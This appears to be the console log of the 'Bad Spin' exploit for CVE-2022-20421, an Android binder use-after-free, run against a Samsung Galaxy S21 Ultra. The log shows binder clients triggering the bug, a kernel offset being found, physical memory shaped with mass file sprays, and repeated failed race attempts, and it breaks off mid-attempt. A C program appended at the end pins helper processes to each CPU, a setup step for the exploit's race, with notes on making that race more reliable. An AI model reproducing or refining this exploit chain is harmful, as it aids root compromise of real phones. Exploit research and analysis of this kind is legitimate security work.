the device power off
.name = "Samsung Galaxy S21 Ultra", // Qualcomm
.model = "SM-G998U",
.android_version = 12,
.android_security_patch.year = 2022,
.android_security_patch.month = 3,
.kernel_version = KERNEL_VERSION(5, 4, 86),
.ram_offset = 0x0,
==========================================
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset
[x] Trigger vulnerability... (mode = 1)
[19384:19384] New binder client: A
[19385:19385] New binder client: B
[19386:19386] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
Testing ptmx 0 (fd 5)
Reading ptmx 0
Testing ptmx 1 (fd 6)
Reading ptmx 1
Testing ptmx 2 (fd 7)
Reading ptmx 2
Testing ptmx 3 (fd 8)
Reading ptmx 3
Testing ptmx 4 (fd 9)
Reading ptmx 4
Testing ptmx 5 (fd 10)
Reading ptmx 5
Testing ptmx 6 (fd 11)
Reading ptmx 6
Testing ptmx 7 (fd 12)
Reading ptmx 7
Testing ptmx 8 (fd 13)
Reading ptmx 8
Testing ptmx 9 (fd 14)
Reading ptmx 9
Testing ptmx 10 (fd 15)
Reading ptmx 10
Testing ptmx 11 (fd 16)
Reading ptmx 11
Testing ptmx 12 (fd 17)
Reading ptmx 12
Testing ptmx 13 (fd 18)
Reading ptmx 13
Testing ptmx 14 (fd 19)
Reading ptmx 14
Testing ptmx 15 (fd 20)
Reading ptmx 15
Testing ptmx 16 (fd 21)
Reading ptmx 16
Testing ptmx 17 (fd 22)
Reading ptmx 17
Testing ptmx 18 (fd 23)
Reading ptmx 18
Testing ptmx 19 (fd 24)
Reading ptmx 19
Testing ptmx 20 (fd 25)
Reading ptmx 20
Freeing ptmx...
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
Joining blocker threads...
All blocker threads joined.
offsetof(inner_lock, binder_proc) = 544
[x] Found binder_proc's inner_lock offset: 544 (vuln_fd 68)
[graveyard_process] pid = 19714
[pipe_process:19715] Pinned to CPU 0
[pipe_process:19716] Pinned to CPU 1
[pipe_process:19717] Pinned to CPU 2
[pipe_process:19719] Pinned to CPU 4
[pipe_process:19718] Pinned to CPU 3
[pipe_process:19720] Pinned to CPU 5
[pipe_process:19722] Pinned to CPU 7
[pipe_process:19721] Pinned to CPU 6
[fd_master_process] pid = 19723
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:19803] 30000 files sprayed
[shaper_process:19802] 30000 files sprayed
[shaper_process:19799] 30000 files sprayed
[shaper_process:19801] 30000 files sprayed
[shaper_process:19800] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=19866
[timer_master_process] Wait for C to enter spin_lock()
[19867:19867] New binder client: A
[19869:19869] New binder client: C
[19868:19868] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
B: Finish.
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
[x] Finish spinning at spin_lock()
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[timer_master_process] Done.
[fd_master_process] pid = 20225
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:20310] 30000 files sprayed
[shaper_process:20307] 30000 files sprayed
[shaper_process:20308] 30000 files sprayed
[shaper_process:20306] 30000 files sprayed
[shaper_process:20309] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=20367
[timer_master_process] Wait for C to enter spin_lock()
[20368:20368] New binder client: A
[20377:20377] New binder client: C
[20369:20369] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 20721
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:20781] 30000 files sprayed
[shaper_process:20779] 30000 files sprayed
[shaper_process:20780] 30000 files sprayed
[shaper_process:20777] 30000 files sprayed
[shaper_process:20778] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=20883
[timer_master_process] Wait for C to enter spin_lock()
[20884:20884] New binder client: A
[20885:20885] New binder client: B
[20886:20886] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 21191
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:21257] 30000 files sprayed
[shaper_process:21255] 30000 files sprayed
[shaper_process:21254] 30000 files sprayed
[shaper_process:21253] 30000 files sprayed
[shaper_process:21256] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[21319:21319] New binder client: B
[timer_master_process] pid=21317
[21318:21318] New binder client: A
[timer_master_process] Wait for C to enter spin_lock()
[21320:21320] New binder client: C
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
[timer_master_process] Done.
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 21650
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:21706] 30000 files sprayed
[shaper_process:21702] 30000 files sprayed
[shaper_process:21703] 30000 files sprayed
[shaper_process:21705] 30000 files sprayed
[shaper_process:21704] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=21833
[timer_master_process] Wait for C to enter spin_lock()
[21836:21836] New binder client: C
[21835:21835] New binder client: B
[21834:21834] New binder client: A
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Waiting for timer threads
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 22180
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:22239] 30000 files sprayed
[shaper_process:22236] 30000 files sprayed
[shaper_process:22235] 30000 files sprayed
[shaper_process:22237] 30000 files sprayed
[shaper_process:22238] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=22301
[timer_master_process] Wait for C to enter spin_lock()
[22304:22304] New binder client: C
[22302:22302] New binder client: A
[22303:22303] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 22604
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:22676] 30000 files sprayed
[shaper_process:22672] 30000 files sprayed
[shaper_process:22673] 30000 files sprayed
[shaper_process:22675] 30000 files sprayed
[shaper_process:22674] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=22766
[timer_master_process] Wait for C to enter spin_lock()
[22769:22769] New binder client: C
[22767:22767] New binder client: A
[22768:22768] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Waiting for timer threads
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 23091
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:23168] 30000 files sprayed
[shaper_process:23166] 30000 files sprayed
[shaper_process:23167] 30000 files sprayed
[shaper_process:23164] 30000 files sprayed
[shaper_process:23165] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=23234
[timer_master_process] Wait for C to enter spin_lock()
[23235:23235] New binder client: A
[23237:23237] New binder client: C
[23236:23236] New binder client: B
A: lookup B => handle = 2
C: lookup A => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
Txn size: 1023.562500KB
B: Destroying
B: Finish.
C: Wait for A...
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161)
[x] Finish spinning at spin_lock()
[x] Waiting for timer threads
[timer_master_process] Done.
..................................................
[x] Failed.
[cleanup_fd_master] Cleanup zombie processes
Cleanup dup processes
Done.
Reset pipe processes
Cleanup shapers
Done.
Cleanup spawner
Cleanup done.
[fd_master_process] pid = 23964
[fd_master_process] Creating dup process spawner
[fd_master_process] Creating 50 dup processes
[fd_master_process] Setup 8 pipe processes
[x] Shaping physical memory
[fd_master_process] Creating 5 shapers
[fd_master_process] Waiting for shapers...
[shaper_process:24040] 30000 files sprayed
[shaper_process:24036] 30000 files sprayed
[shaper_process:24037] 30000 files sprayed
[shaper_process:24038] 30000 files sprayed
[shaper_process:24039] 30000 files sprayed
[fd_master_process] Shapers done.
[fd_master_process] Wait for all dup processes to finish
[x] Trigger vulnerability... (mode = 3)
[timer_master_process] pid=24106
[timer_master_process] Wait for C to enter spin_lock()
[24107:24107] New binder client: A
[24109:24109] New binder client: C
[24108:24108] New binder client: B
C: lookup A => handle = 2
A: lookup B => handle = 2
A: Waiting for strong nodes...
B: Searching for magic badcab1ebadcab1e....
A: 1 references accepted
A: Sending 1 strong handles to B
C: Wait for A...
Txn size: 1023.562500KB
B: Destroying
B: Finish.
monitor_thread_a: Waiting for death notification
monitor_thread_a: Found dead binder (cookie = 0x5858585858585858)
monitor_thread_a: Done
A: Done sending transaction. BR_FAILED_REPLY
poc_a_wait_for_c_death: Waiting for C death notification
[x] Trigger use-after-free
[x] Waiting for timer threads
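The `[pipe_process:PID] Pinned to CPU N` lines earlier in this log show the exploit parking one helper process on each of the eight visible cores before it starts the spinlock race. The C program below is an added example, not code from the Bad Spin exploit or from 0xkol: it reproduces only that pinning step with raw Linux syscalls (`sched_getaffinity`, `sched_setaffinity`, `getcpu`), checks the pin from inside each child instead of trusting the return value, and reports in the same line format as the log. Function names, the 1024-bit mask size and the helper layout are my choices; what the real exploit does with the pinned workers afterwards is not reproduced here.

```c
/* Added example, not part of the Bad Spin exploit: fork one worker per
 * allowed CPU and pin it there, the way the log's pipe_process workers are.
 * Raw syscalls are used so no glibc feature macros are needed. Linux only. */
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>

#define MASK_WORDS 16                                  /* 16 words = 1024 CPU bits */
#define BITS_PER_WORD ((int)(8 * sizeof(unsigned long)))
#define MASK_BYTES (MASK_WORDS * sizeof(unsigned long))
#define MAX_CPUS (MASK_WORDS * BITS_PER_WORD)

/* Fetch the caller's allowed-CPU mask. 0 on success, -1 on error. */
static int get_affinity(unsigned long mask[MASK_WORDS])
{
    for (int i = 0; i < MASK_WORDS; i++)
        mask[i] = 0;
    /* The kernel returns the number of bytes it filled, so > 0 means success. */
    return syscall(SYS_sched_getaffinity, 0, MASK_BYTES, mask) > 0 ? 0 : -1;
}

static int cpu_in_mask(const unsigned long mask[MASK_WORDS], int cpu)
{
    return (int)((mask[cpu / BITS_PER_WORD] >> (cpu % BITS_PER_WORD)) & 1UL);
}

/* Restrict the caller to one CPU. -1 if the kernel refuses (CPU offline or
 * excluded by the cpuset the process lives in). */
int pin_to_cpu(int cpu)
{
    unsigned long mask[MASK_WORDS] = { 0 };
    if (cpu < 0 || cpu >= MAX_CPUS)
        return -1;
    mask[cpu / BITS_PER_WORD] = 1UL << (cpu % BITS_PER_WORD);
    return syscall(SYS_sched_setaffinity, 0, MASK_BYTES, mask) == 0 ? 0 : -1;
}

/* CPU the caller is executing on right now, or -1. */
int current_cpu(void)
{
    unsigned cpu = 0;
    if (syscall(SYS_getcpu, &cpu, NULL, NULL) != 0)
        return -1;
    return (int)cpu;
}

/* Lowest CPU the caller is allowed to run on, or -1. */
int first_allowed_cpu(void)
{
    unsigned long mask[MASK_WORDS];
    if (get_affinity(mask) != 0)
        return -1;
    for (int cpu = 0; cpu < MAX_CPUS; cpu++)
        if (cpu_in_mask(mask, cpu))
            return cpu;
    return -1;
}

/* Pin, then ask the kernel where we run. sched_setaffinity migrates the
 * caller before returning, so on success this equals `cpu`. */
int pin_and_verify(int cpu)
{
    if (pin_to_cpu(cpu) != 0)
        return -1;
    return current_cpu();
}

/* Fork one child per allowed CPU; each child pins itself and reports in the
 * same shape as the log's pipe_process workers. Returns how many children
 * verified their pin. The parent's own affinity is not changed. */
int spawn_pinned_workers(void)
{
    unsigned long mask[MASK_WORDS];
    int spawned = 0, verified = 0;
    if (get_affinity(mask) != 0)
        return -1;
    fflush(stdout);                 /* keep children from re-emitting buffered output */
    for (int cpu = 0; cpu < MAX_CPUS; cpu++) {
        if (!cpu_in_mask(mask, cpu))
            continue;
        pid_t pid = fork();
        if (pid < 0)
            break;
        if (pid == 0) {
            int got = pin_and_verify(cpu);
            printf("[pipe_process:%d] Pinned to CPU %d\n", (int)getpid(), got);
            fflush(stdout);
            _exit(got == cpu ? 0 : 1);
        }
        spawned++;
    }
    for (int i = 0; i < spawned; i++) {
        int status = 0;
        if (wait(&status) > 0 && WIFEXITED(status) && WEXITSTATUS(status) == 0)
            verified++;
    }
    return verified;
}

int main(void)
{
    int n = spawn_pinned_workers();
    printf("%d worker(s) pinned and verified\n", n);
    return n > 0 ? 0 : 1;
}
```

The check in the child matters more than the `sched_setaffinity` return code: a cpuset or offline core makes the pin fail, and a race helper that silently lands on the wrong CPU is exactly the kind of setup error that turns a deterministic spinlock race into the string of `[x] Failed.` attempts this log shows. The parent deliberately keeps its full affinity so the later stages of a run are not confined to one core.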